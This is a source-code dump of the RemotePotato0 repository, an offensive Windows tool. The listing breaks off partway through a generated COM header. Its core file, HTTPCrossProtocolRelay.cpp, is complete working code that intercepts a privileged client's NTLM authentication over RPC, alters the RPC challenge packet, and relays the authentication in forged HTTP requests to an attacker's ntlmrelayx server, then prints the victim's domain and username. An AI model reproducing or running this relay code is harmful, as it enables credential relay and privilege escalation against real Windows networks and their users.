├── .gitignore ├── HTTPCrossProtocolRelay.cpp ├── HTTPCrossProtocolRelay.h ├── IStandardActivator.idl ├── IStandardActivator_h.h ├── IStorageTrigger.cpp ├── IStorageTrigger.h ├── LICENSE ├── README.md ├── RPCCaptureServer.cpp ├── RPCCaptureServer.h ├── RelayLib.cpp ├── RelayLib.h ├── RemotePotato0.cpp ├── RemotePotato0.sln ├── RemotePotato0.vcxproj ├── RemotePotato0.vcxproj.filters ├── RogueOxidResolver.cpp ├── RogueOxidResolver.h ├── RogueOxidResolver.idl ├── RogueOxidResolver_c.c ├── RogueOxidResolver_h.h ├── RogueOxidResolver_s.c ├── demo_cross_session.gif ├── demo_hash_stealer.gif └── network_capture_pcap ├── README.md ├── domain_controller.pcapng └── victim_server.pcapng /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Aa][Rr][Mm]/ 27 | [Aa][Rr][Mm]64/ 28 | bld/ 29 | [Bb]in/ 30 | [Oo]bj/ 31 | [Ll]og/ 32 | [Ll]ogs/ 33 | 34 | # Visual Studio 2015/2017 cache/options directory 35 | .vs/ 36 | # Uncomment if you have tasks that create the project's static files in wwwroot 37 | #wwwroot/ 38 | 39 | # Visual Studio 2017 auto generated files 40 | Generated\ Files/ 41 | 42 | # MSTest test Results 43 | [Tt]est[Rr]esult*/ 44 | [Bb]uild[Ll]og.* 45 | 46 | # NUnit 47 | *.VisualState.xml 48 | TestResult.xml 49 | nunit-*.xml 50 | 51 | # Build Results of an ATL Project 52 | [Dd]ebugPS/ 53 | [Rr]eleasePS/ 54 | dlldata.c 55 | 56 | # Benchmark Results 57 | BenchmarkDotNet.Artifacts/ 58 | 59 | # .NET Core 60 | project.lock.json 61 | project.fragment.lock.json 62 | artifacts/ 63 | 64 | # StyleCop 65 | StyleCopReport.xml 66 | 67 | # Files built by Visual Studio 68 | *_i.c 69 | *_p.c 70 | *_h.h 71 | *.ilk 72 | *.meta 73 | *.obj 74 | *.iobj 75 | *.pch 76 | *.pdb 77 | *.ipdb 78 | *.pgc 79 | *.pgd 80 | *.rsp 81 | *.sbr 82 | *.tlb 83 | *.tli 84 | *.tlh 85 | *.tmp 86 | *.tmp_proj 87 | *_wpftmp.csproj 88 | *.log 89 | *.vspscc 90 | *.vssscc 91 | .builds 92 | *.pidb 93 | *.svclog 94 | *.scc 95 | 96 | # Chutzpah Test files 97 | _Chutzpah* 98 | 99 | # Visual C++ cache files 100 | ipch/ 101 | *.aps 102 | *.ncb 103 | *.opendb 104 | *.opensdf 105 | *.sdf 106 | *.cachefile 107 | *.VC.db 108 | *.VC.VC.opendb 109 | 110 | # Visual Studio profiler 111 | *.psess 112 | *.vsp 113 | *.vspx 114 | *.sap 115 | 116 | # Visual Studio Trace Files 117 | *.e2e 118 | 119 | # TFS 2012 Local Workspace 120 | $tf/ 121 | 122 | # Guidance Automation Toolkit 123 | *.gpState 124 | 125 | # ReSharper is a .NET coding add-in 126 | _ReSharper*/ 127 | *.[Rr]e[Ss]harper 128 | *.DotSettings.user 129 | 130 | # TeamCity is a build add-in 131 | _TeamCity* 132 | 133 | # DotCover is a Code Coverage Tool 134 | *.dotCover 135 | 136 | # AxoCover is a Code Coverage Tool 137 | .axoCover/* 138 | !.axoCover/settings.json 139 | 140 | # Visual Studio code coverage results 141 | *.coverage 142 | *.coveragexml 143 | 144 | # NCrunch 145 | _NCrunch_* 146 | .*crunch*.local.xml 147 | nCrunchTemp_* 148 | 149 | # MightyMoose 150 | *.mm.* 151 | AutoTest.Net/ 152 | 153 | # Web workbench (sass) 154 | .sass-cache/ 155 | 156 | # Installshield output folder 157 | [Ee]xpress/ 158 | 159 | # DocProject is a documentation generator add-in 160 | DocProject/buildhelp/ 161 | DocProject/Help/*.HxT 162 | DocProject/Help/*.HxC 163 | DocProject/Help/*.hhc 164 | DocProject/Help/*.hhk 165 | DocProject/Help/*.hhp 166 | DocProject/Help/Html2 167 | DocProject/Help/html 168 | 169 | # Click-Once directory 170 | publish/ 171 | 172 | # Publish Web Output 173 | *.[Pp]ublish.xml 174 | *.azurePubxml 175 | # Note: Comment the next line if you want to checkin your web deploy settings, 176 | # but database connection strings (with potential passwords) will be unencrypted 177 | *.pubxml 178 | *.publishproj 179 | 180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 181 | # checkin your Azure Web App publish settings, but sensitive information contained 182 | # in these scripts will be unencrypted 183 | PublishScripts/ 184 | 185 | # NuGet Packages 186 | *.nupkg 187 | # NuGet Symbol Packages 188 | *.snupkg 189 | # The packages folder can be ignored because of Package Restore 190 | **/[Pp]ackages/* 191 | # except build/, which is used as an MSBuild target. 192 | !**/[Pp]ackages/build/ 193 | # Uncomment if necessary however generally it will be regenerated when needed 194 | #!**/[Pp]ackages/repositories.config 195 | # NuGet v3's project.json files produces more ignorable files 196 | *.nuget.props 197 | *.nuget.targets 198 | 199 | # Microsoft Azure Build Output 200 | csx/ 201 | *.build.csdef 202 | 203 | # Microsoft Azure Emulator 204 | ecf/ 205 | rcf/ 206 | 207 | # Windows Store app package directories and files 208 | AppPackages/ 209 | BundleArtifacts/ 210 | Package.StoreAssociation.xml 211 | _pkginfo.txt 212 | *.appx 213 | *.appxbundle 214 | *.appxupload 215 | 216 | # Visual Studio cache files 217 | # files ending in .cache can be ignored 218 | *.[Cc]ache 219 | # but keep track of directories ending in .cache 220 | !?*.[Cc]ache/ 221 | 222 | # Others 223 | ClientBin/ 224 | ~$* 225 | *~ 226 | *.dbmdl 227 | *.dbproj.schemaview 228 | *.jfm 229 | *.pfx 230 | *.publishsettings 231 | orleans.codegen.cs 232 | 233 | # Including strong name files can present a security risk 234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 235 | #*.snk 236 | 237 | # Since there are multiple workflows, uncomment next line to ignore bower_components 238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 239 | #bower_components/ 240 | 241 | # RIA/Silverlight projects 242 | Generated_Code/ 243 | 244 | # Backup & report files from converting an old project file 245 | # to a newer Visual Studio version. Backup files are not needed, 246 | # because we have git ;-) 247 | _UpgradeReport_Files/ 248 | Backup*/ 249 | UpgradeLog*.XML 250 | UpgradeLog*.htm 251 | ServiceFabricBackup/ 252 | *.rptproj.bak 253 | 254 | # SQL Server files 255 | *.mdf 256 | *.ldf 257 | *.ndf 258 | 259 | # Business Intelligence projects 260 | *.rdl.data 261 | *.bim.layout 262 | *.bim_*.settings 263 | *.rptproj.rsuser 264 | *- [Bb]ackup.rdl 265 | *- [Bb]ackup ([0-9]).rdl 266 | *- [Bb]ackup ([0-9][0-9]).rdl 267 | 268 | # Microsoft Fakes 269 | FakesAssemblies/ 270 | 271 | # GhostDoc plugin setting file 272 | *.GhostDoc.xml 273 | 274 | # Node.js Tools for Visual Studio 275 | .ntvs_analysis.dat 276 | node_modules/ 277 | 278 | # Visual Studio 6 build log 279 | *.plg 280 | 281 | # Visual Studio 6 workspace options file 282 | *.opt 283 | 284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 285 | *.vbw 286 | 287 | # Visual Studio LightSwitch build output 288 | **/*.HTMLClient/GeneratedArtifacts 289 | **/*.DesktopClient/GeneratedArtifacts 290 | **/*.DesktopClient/ModelManifest.xml 291 | **/*.Server/GeneratedArtifacts 292 | **/*.Server/ModelManifest.xml 293 | _Pvt_Extensions 294 | 295 | # Paket dependency manager 296 | .paket/paket.exe 297 | paket-files/ 298 | 299 | # FAKE - F# Make 300 | .fake/ 301 | 302 | # CodeRush personal settings 303 | .cr/personal 304 | 305 | # Python Tools for Visual Studio (PTVS) 306 | __pycache__/ 307 | *.pyc 308 | 309 | # Cake - Uncomment if you are using it 310 | # tools/** 311 | # !tools/packages.config 312 | 313 | # Tabs Studio 314 | *.tss 315 | 316 | # Telerik's JustMock configuration file 317 | *.jmconfig 318 | 319 | # BizTalk build output 320 | *.btp.cs 321 | *.btm.cs 322 | *.odx.cs 323 | *.xsd.cs 324 | 325 | # OpenCover UI analysis results 326 | OpenCover/ 327 | 328 | # Azure Stream Analytics local run output 329 | ASALocalRun/ 330 | 331 | # MSBuild Binary and Structured Log 332 | *.binlog 333 | 334 | # NVidia Nsight GPU debugger configuration file 335 | *.nvuser 336 | 337 | # MFractors (Xamarin productivity tool) working folder 338 | .mfractor/ 339 | 340 | # Local History for Visual Studio 341 | .localhistory/ 342 | 343 | # BeatPulse healthcheck temp database 344 | healthchecksdb 345 | 346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 347 | MigrationBackup/ 348 | 349 | # Ionide (cross platform F# VS Code tools) working folder 350 | .ionide/ 351 | -------------------------------------------------------------------------------- /HTTPCrossProtocolRelay.cpp: -------------------------------------------------------------------------------- 1 | #define WIN32_LEAN_AND_MEAN 2 | 3 | #include "Windows.h" 4 | #include "stdio.h" 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include "HTTPCrossProtocolRelay.h" 10 | #include "RelayLib.h" 11 | 12 | #pragma comment (lib, "Ws2_32.lib") 13 | #pragma comment (lib, "Crypt32.lib") 14 | 15 | #pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS 16 | 17 | #define DEFAULT_BUFLEN 8192 18 | 19 | extern BOOL g_SuccessTrigger; 20 | 21 | void DoHTTPCrossProtocolRelay(wchar_t* remoteIpRelay, wchar_t* remotePortRelay, wchar_t* rpcServerIp, wchar_t* rpcServerPort, wchar_t* rpcRelayServerListeningPort) 22 | { 23 | int iResult = 0; 24 | int recvbuflen = DEFAULT_BUFLEN; 25 | int sendbuflen = DEFAULT_BUFLEN; 26 | int ntlmIndex = 0; 27 | BOOL conn_flag = FALSE; 28 | char sendbuf[DEFAULT_BUFLEN]; 29 | char recvbuf[DEFAULT_BUFLEN]; 30 | char ntlmType1[DEFAULT_BUFLEN]; 31 | char ntlmType2[DEFAULT_BUFLEN]; 32 | int ntlmType2Len = 0; 33 | char ntlmType3[DEFAULT_BUFLEN]; 34 | int ntlmType3Len = 0; 35 | 36 | char* httpPacketType1; 37 | int httpPacketType1Len; 38 | char* httpPacketType3; 39 | int httpPacketType3Len; 40 | 41 | char type1BakBuffer[DEFAULT_BUFLEN]; 42 | int type1BakLen = 0; 43 | 44 | SOCKET RPCSocketListen = CreateRPCSocketListen(rpcRelayServerListeningPort); 45 | SOCKET RPCSocketReflect = NULL; 46 | SOCKET HTTPSocket = CreateHTTPSocket(remoteIpRelay, remotePortRelay); 47 | 48 | do { 49 | iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0); 50 | if (!conn_flag) { 51 | RPCSocketReflect = CreateRPCSocketReflect(rpcServerIp, rpcServerPort); 52 | conn_flag = TRUE; 53 | } 54 | ntlmIndex = findNTLMBytes(recvbuf, iResult); 55 | // if the rpc packet contains ntlm auth information we do our magic (cross protocol relay) 56 | if (ntlmIndex > 0) { 57 | // save the rpc packet of type1 authentication to forward it later to the fake RPC server (we reuse the RogueOxidResolver) 58 | memcpy(type1BakBuffer, recvbuf, iResult); 59 | type1BakLen = iResult; 60 | // copy in ntlmType1 the extracted auth information from the received buffer 61 | memcpy(ntlmType1, recvbuf + ntlmIndex, iResult - ntlmIndex); 62 | // forge the http packet with the type 1 auth and send it to the http server 63 | httpPacketType1 = ForgeHTTPRequestType1(ntlmType1, iResult - ntlmIndex, &httpPacketType1Len, remoteIpRelay); 64 | if (send(HTTPSocket, httpPacketType1, httpPacketType1Len, 0) == SOCKET_ERROR) { 65 | printf("[!] Couldn't forge the http packet with the type 1 auth and send it to the http server.\n"); 66 | break; 67 | } 68 | Sleep(1000); 69 | // receive the http response from the http server including type2 message 70 | iResult = recv(HTTPSocket, recvbuf, recvbuflen, 0); 71 | if (iResult == SOCKET_ERROR) { 72 | printf("[!] Couldn't receive the http response from the http server\n"); 73 | break; 74 | } 75 | // extract from the http packet the type2 ntlm message 76 | ExtractType2FromHttp(recvbuf, iResult, ntlmType2, &ntlmType2Len); 77 | // here we communicate with our fake RPC Server to have just the template for rpc packets, sending the type1 78 | if (send(RPCSocketReflect, type1BakBuffer, type1BakLen, 0) == SOCKET_ERROR) { 79 | printf("[!] Couldn't communicate with the fake RPC Server\n"); 80 | break; 81 | } 82 | // receiving the type2 message from the fake RPC Server to use as a template for our relayed auth 83 | iResult = recv(RPCSocketReflect, recvbuf, recvbuflen, 0); 84 | if (iResult == SOCKET_ERROR) { 85 | printf("[!] Couldn't receive the type2 message from the fake RPC Server\n"); 86 | break; 87 | } 88 | // get the ntlmindex from the type2 message received from the fake rpc server 89 | ntlmIndex = findNTLMBytes(recvbuf, iResult); 90 | // in this function we take the packet template from a real rpc server and we alter the authentication part, 91 | // in this case we change the original type2 with the type2 received by the http server. We also adjust the len of the rpc packet fragLen and authLen 92 | // to not break the rpc protocol 93 | ForgeAndAlterType2Rpc(recvbuf, iResult, ntlmIndex, ntlmType2, ntlmType2Len, sendbuf); 94 | // send the altered type2 to the rpc client (the privileged auth) 95 | if (send(RPCSocketListen, sendbuf, ntlmIndex + ntlmType2Len, 0) == SOCKET_ERROR) { 96 | printf("[!] Couldn't send the altered type2 to the rpc client (the privileged auth)\n"); 97 | break; 98 | } 99 | // receive the type3 auth from the rpc client. This is the privileged AUTH that the client is sending us 100 | iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0); 101 | if (iResult == SOCKET_ERROR) { 102 | printf("[!] Couldn't receive the type3 auth from the rpc client\n"); 103 | break; 104 | } 105 | // extract the type3 auth from the rpc packet 106 | ExtractType3FromRpc(recvbuf, iResult, ntlmType3, &ntlmType3Len); 107 | // forge the http packet containing the type3 AUTH 108 | httpPacketType3 = ForgeHTTPRequestType3(ntlmType3, ntlmType3Len, &httpPacketType3Len, remoteIpRelay); 109 | // send the type3 AUTH to the http server, cross the finger :D 110 | if (send(HTTPSocket, httpPacketType3, httpPacketType3Len, 0) == SOCKET_ERROR) { 111 | printf("[!] Couldn't send the type3 AUTH to the http server\n"); 112 | break; 113 | } 114 | ParseUsernameFromType3(ntlmType3, ntlmType3Len); 115 | // receive the output from the http server. If using ntlmrelayx a 404 response means a succesfull relay. 116 | iResult = recv(HTTPSocket, recvbuf, recvbuflen, 0); 117 | if (iResult == SOCKET_ERROR) { 118 | printf("[!] Couldn't receive the output from the http server\n"); 119 | break; 120 | } 121 | if (recvbuf[9] == '4' && recvbuf[10] == '0' && recvbuf[11] == '4') 122 | printf("[+] Relaying seems successfull, check ntlmrelayx output!\n"); 123 | else 124 | printf("[!] Relaying failed :(\n"); 125 | break; 126 | } 127 | } while (iResult > 0); 128 | closesocket(RPCSocketListen); 129 | closesocket(RPCSocketReflect); 130 | closesocket(HTTPSocket); 131 | WSACleanup(); 132 | } 133 | 134 | 135 | SOCKET CreateHTTPSocket(const wchar_t* remoteHTTPIp, const wchar_t* remoteHttpPort) { 136 | //---------------------- 137 | // Initialize Winsock 138 | 139 | char remoteHTTPIp_a[20]; 140 | char remotePort_a[12]; 141 | int remotePort; 142 | WSADATA wsaData; 143 | int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); 144 | if (iResult != NO_ERROR) { 145 | wprintf(L"WSAStartup function failed with error: %d\n", iResult); 146 | return 1; 147 | } 148 | //---------------------- 149 | // Create a SOCKET for connecting to server 150 | SOCKET ConnectSocket; 151 | ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 152 | if (ConnectSocket == INVALID_SOCKET) { 153 | wprintf(L"socket function failed with error: %ld\n", WSAGetLastError()); 154 | WSACleanup(); 155 | return 1; 156 | } 157 | //---------------------- 158 | // The sockaddr_in structure specifies the address family, 159 | // IP address, and port of the server to be connected to. 160 | 161 | memset(remotePort_a, 0, 12); 162 | wcstombs(remotePort_a, remoteHttpPort, 12); 163 | memset(remoteHTTPIp_a, 0, 20); 164 | wcstombs(remoteHTTPIp_a, remoteHTTPIp, 20); 165 | remotePort = atoi(remotePort_a); 166 | sockaddr_in clientService; 167 | clientService.sin_family = AF_INET; 168 | clientService.sin_addr.s_addr = inet_addr(remoteHTTPIp_a); 169 | clientService.sin_port = htons(remotePort); 170 | 171 | //---------------------- 172 | // Connect to server. 173 | iResult = connect(ConnectSocket, (SOCKADDR*)& clientService, sizeof(clientService)); 174 | if (iResult == SOCKET_ERROR) { 175 | wprintf(L"CreateHTTPSocket: connect function failed with error: %ld\n", WSAGetLastError()); 176 | iResult = closesocket(ConnectSocket); 177 | if (iResult == SOCKET_ERROR) 178 | wprintf(L"closesocket function failed with error: %ld\n", WSAGetLastError()); 179 | WSACleanup(); 180 | return 1; 181 | } 182 | 183 | printf("[*] Connected to ntlmrelayx HTTP Server %S on port %S\n", remoteHTTPIp, remoteHttpPort); 184 | return ConnectSocket; 185 | } 186 | 187 | char* ForgeHTTPRequestType1(char* ntlmsspType1, int ntlmsspType1Len, int* httpPacketType1Len, wchar_t* httpIp) { 188 | char httpPacketTemplate[] = "GET / HTTP/1.1\r\nHost: %s\r\nAuthorization: NTLM %s\r\n\r\n"; 189 | char* httpPacket = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, DEFAULT_BUFLEN); 190 | int b64ntlmLen; 191 | char httpIp_a[20]; 192 | memset(httpIp_a, 0, 20); 193 | wcstombs(httpIp_a, httpIp, 20); 194 | char* b64ntlmTmp = base64Encode(ntlmsspType1, ntlmsspType1Len, &b64ntlmLen); 195 | char b64ntlm[DEFAULT_BUFLEN]; 196 | memset(b64ntlm, 0, DEFAULT_BUFLEN); 197 | memcpy(b64ntlm, b64ntlmTmp, b64ntlmLen); 198 | *httpPacketType1Len = sprintf(httpPacket, httpPacketTemplate, httpIp_a, b64ntlm); 199 | return httpPacket; 200 | } 201 | 202 | char* ForgeHTTPRequestType3(char* ntlmsspType3, int ntlmsspType3Len, int* httpPacketType3Len, wchar_t* httpIp) { 203 | char httpPacketTemplate[] = "GET / HTTP/1.1\r\nHost: %s\r\nAuthorization: NTLM %s\r\n\r\n"; 204 | char* httpPacket = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, DEFAULT_BUFLEN); 205 | int b64ntlmLen; 206 | char httpIp_a[20]; 207 | memset(httpIp_a, 0, 20); 208 | wcstombs(httpIp_a, httpIp, 20); 209 | char* b64ntlmTmp = base64Encode(ntlmsspType3, ntlmsspType3Len, &b64ntlmLen); 210 | char b64ntlm[DEFAULT_BUFLEN]; 211 | memset(b64ntlm, 0, DEFAULT_BUFLEN); 212 | memcpy(b64ntlm, b64ntlmTmp, b64ntlmLen); 213 | *httpPacketType3Len = sprintf(httpPacket, httpPacketTemplate, httpIp_a, b64ntlm); 214 | return httpPacket; 215 | } 216 | 217 | void ExtractType2FromHttp(char* httpPacket, int httpPacketLen, char* ntlmType2, int* ntlmType2Len) { 218 | char b64Type2[DEFAULT_BUFLEN]; 219 | int b64Type2Len = 0; 220 | findBase64NTLM(httpPacket, httpPacketLen, b64Type2, &b64Type2Len); 221 | char* decodedType2Tmp = base64Decode(b64Type2, b64Type2Len, ntlmType2Len); 222 | memset(ntlmType2, 0, DEFAULT_BUFLEN); 223 | memcpy(ntlmType2, decodedType2Tmp, *ntlmType2Len); 224 | } 225 | 226 | void ParseUsernameFromType3(char* ntlmType3, int ntlmType3Len) { 227 | short* domainLen, * userLen, * hostnameLen; 228 | __int32* domainOffset, * userOffset, * hostnameOffset; 229 | wchar_t domain[32], user[32], hostname[32]; 230 | domainLen = (short*)(ntlmType3 + 28); 231 | userLen = (short*)(ntlmType3 + 36); 232 | hostnameLen = (short*)(ntlmType3 + 44); 233 | domainOffset = (__int32*)(ntlmType3 + 32); 234 | userOffset = (__int32*)(ntlmType3 + 40); 235 | hostnameOffset = (__int32*)(ntlmType3 + 48); 236 | memset(domain, 0, 32); 237 | memcpy(domain, ntlmType3 + (*domainOffset), *domainLen); 238 | memset(user, 0, 32); 239 | memcpy(user, ntlmType3 + (*userOffset), *userLen); 240 | memset(hostname, 0, 32); 241 | memcpy(hostname, ntlmType3 + (*hostnameOffset), *hostnameLen); 242 | printf("[+] Got NTLM type 3 AUTH message from %S\\%S with hostname %S \n", domain, user, hostname); 243 | g_SuccessTrigger = TRUE; 244 | } 245 | 246 | int findBase64NTLM(char* buffer, int buffer_len, char* outbuffer, int* outbuffer_len) { 247 | char pattern_head[] = { 'N', 'T', 'L', 'M', ' ' }; 248 | char pattern_tail[2] = { 0x0D, 0x0A }; // \r\n 249 | int index_start = 0; 250 | for (int i = 0; i < buffer_len; i++) { 251 | } 252 | for (int i = 0; i < buffer_len; i++) { 253 | if (buffer[i] == pattern_head[index_start]) { 254 | index_start = index_start + 1; 255 | if (index_start == sizeof(pattern_head)) { 256 | index_start = i + 1; 257 | break; 258 | } 259 | } 260 | } 261 | *outbuffer_len = 0; 262 | for (int i = index_start; i < buffer_len; i++) { 263 | if (buffer[i] == pattern_tail[0] && buffer[i + 1] == pattern_tail[1]) { 264 | break; 265 | } 266 | outbuffer[(*outbuffer_len)] = buffer[i]; 267 | *outbuffer_len = (*outbuffer_len) + 1; 268 | } 269 | //printf("*outbuffer_len: %d and index_start: %d", *outbuffer_len,index_start); 270 | //hexDump2(NULL, outbuffer, *outbuffer_len); 271 | return 0; 272 | } 273 | 274 | char* base64Encode(char* text, int textLen, int* b64Len) { 275 | *b64Len = DEFAULT_BUFLEN; 276 | char* b64Text = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, *b64Len); 277 | if (!CryptBinaryToStringA((const BYTE*)text, textLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64Text, (DWORD*)b64Len)) { 278 | printf("CryptBinaryToStringA failed with error code %d", GetLastError()); 279 | HeapFree(GetProcessHeap(), 0, b64Text); 280 | b64Text = NULL; 281 | exit(-1); 282 | } 283 | return b64Text; 284 | } 285 | 286 | char* base64Decode(char* b64Text, int b64TextLen, int* bufferLen) { 287 | *bufferLen = DEFAULT_BUFLEN; 288 | char* buffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, *bufferLen); 289 | if (!CryptStringToBinaryA((LPCSTR)b64Text, b64TextLen, CRYPT_STRING_BASE64, (BYTE*)buffer, (DWORD*)bufferLen, NULL, NULL)) { 290 | printf("CryptStringToBinaryA failed with error code %d", GetLastError()); 291 | HeapFree(GetProcessHeap(), 0, buffer); 292 | buffer = NULL; 293 | exit(-1); 294 | } 295 | return buffer; 296 | } 297 | -------------------------------------------------------------------------------- /HTTPCrossProtocolRelay.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Windows.h" 3 | 4 | void DoHTTPCrossProtocolRelay(wchar_t*, wchar_t*, wchar_t*, wchar_t*, wchar_t*); 5 | SOCKET CreateHTTPSocket(const wchar_t*, const wchar_t*); 6 | char* ForgeHTTPRequestType1(char*, int, int*, wchar_t*); 7 | char* ForgeHTTPRequestType3(char*, int, int*, wchar_t*); 8 | void ExtractType2FromHttp(char*, int, char*, int*); 9 | void ParseUsernameFromType3(char*, int); 10 | int findBase64NTLM(char*, int, char*, int*); 11 | char* base64Encode(char*, int, int*); 12 | char* base64Decode(char*, int, int*); -------------------------------------------------------------------------------- /IStandardActivator.idl: -------------------------------------------------------------------------------- 1 | import "oaidl.idl"; 2 | import "ocidl.idl"; 3 | 4 | [ 5 | object, 6 | local, 7 | uuid(000001b8-0000-0000-C000-000000000046), 8 | pointer_default(unique) 9 | ] 10 | interface IStandardActivator : IUnknown 11 | { 12 | HRESULT StandardGetClassObject([in] REFCLSID rclsid, 13 | [in] DWORD dwClsCtx, 14 | [in] COSERVERINFO* pServerInfo, 15 | [in] REFIID riid, 16 | [out, iid_is(riid)] void** ppv); 17 | 18 | HRESULT StandardCreateInstance([in] REFCLSID Clsid, 19 | [in] IUnknown* punkOuter, 20 | [in] DWORD dwClsCtx, 21 | [in] COSERVERINFO* pServerInfo, 22 | [in] DWORD dwCount, 23 | [in, size_is(dwCount)] MULTI_QI* pResults); 24 | 25 | HRESULT StandardGetInstanceFromFile( 26 | [in] COSERVERINFO* pServerInfo, 27 | [in] CLSID* pclsidOverride, 28 | [in] IUnknown* punkOuter, 29 | [in] DWORD dwClsCtx, 30 | [in] DWORD grfMode, 31 | [in] OLECHAR* pwszName, 32 | [in] DWORD dwCount, 33 | [in, size_is(dwCount)] MULTI_QI* pResults); 34 | 35 | HRESULT StandardGetInstanceFromIStorage( 36 | [in] COSERVERINFO* pServerInfo, 37 | [in] CLSID* pclsidOverride, 38 | [in] IUnknown* punkOuter, 39 | [in] DWORD dwClsCtx, 40 | [in] IStorage* pstg, 41 | [in] DWORD dwCount, 42 | [in, size_is(dwCount)] MULTI_QI* pResults); 43 | 44 | HRESULT Reset(); 45 | } 46 | 47 | [ 48 | object, 49 | local, 50 | uuid(000001b9-0000-0000-C000-000000000046), 51 | pointer_default(unique) 52 | ] 53 | interface ISpecialSystemProperties : IUnknown 54 | { 55 | HRESULT SetSessionId([in] ULONG dwSessionId, [in]BOOL bUseConsole, [in] BOOL fRemoteThisSessionId); 56 | HRESULT GetSessionId([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole); 57 | HRESULT GetSessionId2([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole, [out] BOOL* pfRemoteThisSessionId); 58 | HRESULT SetClientImpersonating([in]BOOL fClientImpersonating); 59 | HRESULT GetClientImpersonating([out]BOOL* pfClientImpersonating); 60 | HRESULT SetPartitionId([in] REFGUID guidPartiton); 61 | HRESULT GetPartitionId([out] GUID* pguidPartiton); 62 | HRESULT SetProcessRequestType([in] DWORD dwPRT); 63 | HRESULT GetProcessRequestType([out] DWORD* pdwPRT); 64 | HRESULT SetOrigClsctx([in] DWORD dwClsctx); 65 | HRESULT GetOrigClsctx([out] DWORD* dwClsctx); 66 | HRESULT GetDefaultAuthenticationLevel([out] DWORD* pdwAuthnLevel); 67 | HRESULT SetDefaultAuthenticationLevel([in] DWORD dwAuthnLevel); 68 | } 69 | -------------------------------------------------------------------------------- /IStandardActivator_h.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Tue Jan 19 04:14:07 2038 8 | */ 9 | /* Compiler settings for IStandardActivator.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | #ifndef COM_NO_WINDOWS_H 34 | #include "windows.h" 35 | #include "ole2.h" 36 | #endif /*COM_NO_WINDOWS_H*/ 37 | 38 | #ifndef __IStandardActivator_h_h__ 39 | #define __IStandardActivator_h_h__ 40 | 41 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 42 | #pragma once 43 | #endif 44 | 45 | /* Forward Declarations */ 46 | 47 | #ifndef __IStandardActivator_FWD_DEFINED__ 48 | #define __IStandardActivator_FWD_DEFINED__ 49 | typedef interface IStandardActivator IStandardActivator; 50 | 51 | #endif /* __IStandardActivator_FWD_DEFINED__ */ 52 | 53 | 54 | #ifndef __ISpecialSystemProperties_FWD_DEFINED__ 55 | #define __ISpecialSystemProperties_FWD_DEFINED__ 56 | typedef interface ISpecialSystemProperties ISpecialSystemProperties; 57 | 58 | #endif /* __ISpecialSystemProperties_FWD_DEFINED__ */ 59 | 60 | 61 | /* header files for imported files */ 62 | #include "oaidl.h" 63 | #include "ocidl.h" 64 | 65 | #ifdef __cplusplus 66 | extern "C"{ 67 | #endif 68 | 69 | 70 | #ifndef __IStandardActivator_INTERFACE_DEFINED__ 71 | #define __IStandardActivator_INTERFACE_DEFINED__ 72 | 73 | /* interface IStandardActivator */ 74 | /* [unique][uuid][local][object] */ 75 | 76 | 77 | EXTERN_C const IID IID_IStandardActivator; 78 | 79 | #if defined(__cplusplus) && !defined(CINTERFACE) 80 | 81 | MIDL_INTERFACE("000001b8-0000-0000-C000-000000000046") 82 | IStandardActivator : public IUnknown 83 | { 84 | public: 85 | virtual HRESULT STDMETHODCALLTYPE StandardGetClassObject( 86 | /* [in] */ REFCLSID rclsid, 87 | /* [in] */ DWORD dwClsCtx, 88 | /* [in] */ COSERVERINFO *pServerInfo, 89 | /* [in] */ REFIID riid, 90 | /* [iid_is][out] */ void **ppv) = 0; 91 | 92 | virtual HRESULT STDMETHODCALLTYPE StandardCreateInstance( 93 | /* [in] */ REFCLSID Clsid, 94 | /* [in] */ IUnknown *punkOuter, 95 | /* [in] */ DWORD dwClsCtx, 96 | /* [in] */ COSERVERINFO 